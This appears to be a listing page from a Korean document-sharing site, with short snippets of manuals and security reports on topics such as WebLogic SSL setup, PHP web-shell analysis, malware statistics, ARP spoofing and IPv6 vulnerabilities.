BEA WebLogic Server SSL 설정방법 - Ver 1.0-2008. 6 개정이력 버전개정일개정내용 Ver 1.0 2008 년 6 월 BEA WebLogic Server SSL 설명서최초작성 본문서는정보통신부 한국정보보호진흥원의 보안서버구축가이드 를참고하여작성되었습니다. 본문서내용의무단도용및사용을금합니다. < 목차 > 1. 개인키및 CSR 생성방법
More information<5BB5BFB8EDB4EB2D E4B5D C0A5BDA9C0C720BAD0BCAEB0FA20B4EBC0C020B9E6BEC82E687770>
기술문서 08. 10. 25. 작성 PHP 기반웹쉘의동작원리와공개웹쉘의기능분석및대응방안 작성자 : 동명대학교 THINK 정정홍 (zeratul621@naver.com) 1. 시작하면서 p. 2 2. 웹쉘의동작원리 p. 3 3. r57shell p. 5 4. kcwebtelnet p. 9 5. phpremoteview p. 10 6. 웹쉘대응방안 p. 12 동명대학교정보보호동아리
More informationUser Guide
HP Pocket Playlist 사용 설명서 부품 번호: 699916-AD2 제 2 판: 2013 년 1 월, 초판: 2012 년 12 월 Copyright 2012, 2013 Hewlett-Packard Development Company, L.P. Microsoft, Windows 및 Windows Vista 는 Microsoft Corporation
More informationⅠ. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드의주요동향을파악하기위하여, 악성코드별변종을 종합한악성코드대표진단명감염보고 Top 20 이다 년 2 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-
Ⅰ. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드의주요동향을파악하기위하여, 악성코드별변종을 종합한악성코드대표진단명감염보고 Top 20 이다. 2010 년 2 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-1] 악성코드감염보고 Top 20 2010년 2월의악성코드감염보고는 Win32/Induc이
More informationActFax 4.31 Local Privilege Escalation Exploit
NSHC 2013. 05. 23 악성코드 분석 보고서 [ Ransomware 악성코드 ] 사용자의 컴퓨터를 강제로 잠그고 돈을 요구하는 형태의 공격이 기승을 부리고 있 습니다. 이러한 형태의 공격에 이용되는 악성코드는 Ransomware로 불리는 악성코 드 입니다. 한번 감염 시 치료절차가 복잡하며, 보고서 작성 시점을 기준으로 지속 적인 피해자가 발생되고
More informationMicrosoft Word - src.doc
IPTV 서비스탐색및콘텐츠가이드 RI 시스템운용매뉴얼 목차 1. 서버설정방법... 5 1.1. 서비스탐색서버설정... 5 1.2. 컨텐츠가이드서버설정... 6 2. 서버운용방법... 7 2.1. 서비스탐색서버운용... 7 2.1.1. 서비스가이드서버실행... 7 2.1.2. 서비스가이드정보확인... 8 2.1.3. 서비스가이드정보추가... 9 2.1.4. 서비스가이드정보삭제...
More informationMicrosoft PowerPoint - 10Àå.ppt
10 장. DB 서버구축및운영 DBMS 의개념과용어를익힌다. 간단한 SQL 문법을학습한다. MySQL 서버를설치 / 운영한다. 관련용어 데이터 : 자료 테이블 : 데이터를표형식으로표현 레코드 : 테이블의행 필드또는컬럼 : 테이블의열 필드명 : 각필드의이름 데이터타입 : 각필드에입력할값의형식 학번이름주소연락처 관련용어 DB : 테이블의집합 DBMS : DB 들을관리하는소프트웨어
More information호스팅사업자보안안내서 ( 해킹경유지악용방지 ) 침해사고분석단사고분석팀
호스팅사업자보안안내서 ( 해킹경유지악용방지 ) 침해사고분석단사고분석팀 2015. 3. 제 1 장개요 1 1. ( 사고사례 1) ARP 스푸핑 2 2. ( 사고사례 2) 공유폴더악용 3 제 2 장 ARP 스푸핑 6 1. ARP 스푸핑공격개요 7 2. ARP 스푸핑공격발생증상 7 3. ARP 스푸핑공격확인방법 8 4. ARP 스푸핑공격대응방안 ( 서버 ) 9 5.
More informationIPv6 보안취약점동향 인터넷주소산업팀 정유경선임연구원, 김웅상책임연구원, 임준형팀장 2014년 9월, 국내 IPv6 상용서비스의개시와함께 IPv6 도입및전환이시작되었다. 국내외적으로 IPv6로의전환에따른관련통계자료들이증가추세를보이며실제환경속으로 IPv6주소가들어오고있
IPv6 보안취약점동향 2014. 11 IPv6 보안취약점동향 인터넷주소산업팀 정유경선임연구원, 김웅상책임연구원, 임준형팀장 2014년 9월, 국내 IPv6 상용서비스의개시와함께 IPv6 도입및전환이시작되었다. 국내외적으로 IPv6로의전환에따른관련통계자료들이증가추세를보이며실제환경속으로 IPv6주소가들어오고있다. IPv6 도입및전환에앞서인프라영역에서네트워크장비나
More informationWindows Server 2012
Windows Server 2012 Shared Nothing Live Migration Shared Nothing Live Migration 은 SMB Live Migration 방식과다른점은 VM 데이터파일의위치입니다. Shared Nothing Live Migration 방식은 Hyper-V 호스트의로컬디스크에 VM 데이터파일이위치합니다. 반면에, SMB
More information